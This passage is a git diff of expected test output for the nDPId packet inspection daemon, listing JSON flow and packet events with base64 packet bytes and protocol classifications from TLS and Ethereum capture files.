{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3
Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7560000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":3,"packets-processed":3,"total-skipped-flows":0,"total-l4-data-len":2148,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1590680391590} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3/3 diff --git a/test/results/ethereum.pcap.out b/test/results/ethereum.pcap.out index c0f0a019d..1d40f026e 100644 --- a/test/results/ethereum.pcap.out +++ b/test/results/ethereum.pcap.out 
@@ -28,219 +28,219 @@ 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1578508364422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508364422,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHAOAAAEAR3JLAqAG4NOelbHZfdl8As+U915lp9gBLtC6IaCW33is1Th50j8UHjOmT4mAffcZn+yYEl4jGBnLnkKaeXePCjndUh79\/WTQA2R4kNex3KmtFmldicE1yJNj24ZecPC4hxpTcI9qIeMXPlU0BU5Rec0LcAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBg"} 01863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAQ7F1RAAC8RPN4D0S1PwKgBuHZfdl8EJ4PVaVYTvO9LrTk6yni9j9O4lLCx8c3w2iOwFQRksfASVhzN6T8K7lnXRwHY7v3+ONhElGFbYOffjDytd02o206R62nDNZ+LcEa5V5K9KHZQh029ihE8Ury3mI0LZjHE13ZDAAT5A7r5A7L4S4QjtPapgnZdgLhAO5qC1ATimkffsyZlSJIXGVIuxdFsM86E7cqAjFOnv\/8DXNCQHJBVJiDXoCE+xGUbCBkPCreAagxpFk0Kv5X\/6PhNhKUWayGCdl+Cdl+4QFK2HHRAlM9Mj+TxGD7ACVRZHZtB58hxcD+hW2XdmacQwMOkGeflfz3iQaCGa6bw7UpxurZYH9DtQSW8Gn+wiV74TYRZJmMignZfgnZfuEBNXexB6IZur6GByNXF5kqBGoYoINyuPaRzRT\/L\/XeZwo80a\/N6vMBtsgrq2ZF9h4G0sqa47Wg7uKDWSZtY6p\/o+E2EsoDD3IJ2X4J2X7hAE9D206tRuSrRWszd5+5PqyxrzPQHPgJ6M4jR3YAwA4SXyWoQd9UmDUgHBtsrr3UYDBX+DpI9ijrH8jmNKWfim\/hNhKLzoFOCdl+Cdl+4QFcgAb+wxvXRoA\/jZ6pZpvtWMqWRnDTAVCrWET9xUm+STSO+d5OO9wGG7pHu9I5ueUw\/fAd5lu3NtaUH9uwTgQX4TYQSilEcgnZfgnZfuEDrOA+HQ7eWMjwlUeqXlrKvkuj1DTxVelkYAtV5dglpnIhrBZIeo034r7N3OARecEoNp0x6OeeY\/TD1OnJUir9u+E2EMyY8T4J2X4J2X7hAjvDxlr5M7BUzw40ony1SnzUKukEALVTn0B8WrIdd1Y\/HWL6mkTC4nsoMDegX1FF++rF
MqjeViKJkeSDvzXh7sPhNhChDkICCdl+Cdl+4QHLmnbcNhaAJxQnuC0km5NBqC0yHT\/O8y7iwbqWb3zIi\/JNBIGOytm1SPyhBCVXEAh08vp59waAp0Fl3XZsLDpX4TYTH56bignZggnZguEAmai5v1neViV7teAsEvO\/IJYfemYLf2+j3ix3twO4cHaO8DDPa+4MSEcEzAFsUx\/2pmlUPII1TqUXgDk2+EYuF+E2EMyZRtIJ2X4J2X7hAgHT+RrAG20B8DB\/bHPvQKm79m+Z0+BB1fJpuHmieLdFavNthxznxmL2TjLC2hF17uhr9nJ8lRGk+kyETydUasfhNhFKR3PmCdl+Cdl+4QN1yRfRd+2g8MnNCa1j1Cnr1GFpxy7vxkYduQKQx1cGeo9xW0LFVTR4sISMRFqTJvP1+kBDeZDQ7++taiTPWLVf4TYSfy1QfgnZfgnZfuEATr9aMDwnYcu1Ru9AfCYxf1j4pIYv3iEkEPcprByn6GaZXC692Pg7aNtJE7Ibn2jkRlWjrNM1fsvjqm9oBENLzhF4WIGA="} 01006{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1578508364519,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":467,"pkt_l4_len":433,"thread_ts_msec":1578508364519,"pkt":"KDc3AG3IEBMx8Tl2CABFAAHFF1VAAC8RP1MD0S1PwKgBuHZfdl8BsTR2htDCYwB7bPwVHRrppzCkGewLkUUNlB3jVcwKSsPl3PpRPPiYpogGSbVhGO6LOf+6vpmiVjQKuGK9fr9HzQor5V9uX7UyvZMEj8wMYsgT45Bz2Z7bdsQaazyQJOYgw3sXAAT5AUT5ATz4TYSi5B2ggnZfgnZfuEAwVdpN68jOobX+wHrrL2RH\/wK1ka2szeSJGHiHFFoNLEPxKwxFy33NRZ3ovPOnkwdh3qJaARUyaYeXnrMHfiPL+E2EpERrUoJ2YYJ2YbhAbVK4hBOIFxjMK61hoo+B2E1DFAGWystZDApZ1qWqMdGzPO6EtDCqKOy2kznyTf9sEf\/6IzNe3mDxF09nkCXqPPhNhCPpxYOCdl+Cdl+4QEyRwYHw012pKtGG4pX25QXUlp9AiY+SLu1l7sUn3fRNHZfvnNA3az+glcVdf8irWyfLyfxkF3pVP8czohGx7uH4TYTR+vDNgnZfgnZfuEDT1Pf73xy4M3qZSRLleOgEdgguFkAavHpg2I9RZUlU1ZSe7W107ts9v4ZrZs61PWJz3Pgt4YI56NsUnL8RZ7gNhF4WIGA="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364522,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364522,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"66.42.82.246","src_port":56612,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364522,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4zfAqAG4QipS9t0kdl9\/aKJnAAAAALAC\/\/+zAAAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364522,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364522,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364522,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGaCDAqAG4pRZrId0idl9zKqGzAAAAALAC\/\/9E3QAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364522,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364522,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"104.42.217.25","src_port":56611,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364522,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNxTAqAG4aCrZGd0jdl\/sFGYiAAAAALAC\/\/\/WdgAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364522,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364522,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"162.243.160.83","src_port":56613,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364522,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGNRHAqAG4ovOgU90ldl\/qeq6yAAAAALAC\/\/+NewAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364522,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364522,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1578508364522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508364522,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGYCLAqAG4I570l90ndl+E\/i4vAAAAALAC\/\/+eigAAAgQFtAEDAwUBAQgKItiUTwAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508364523,"flow_last_seen":1578508364523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508364523,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.97.172.22","src_port":56617,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 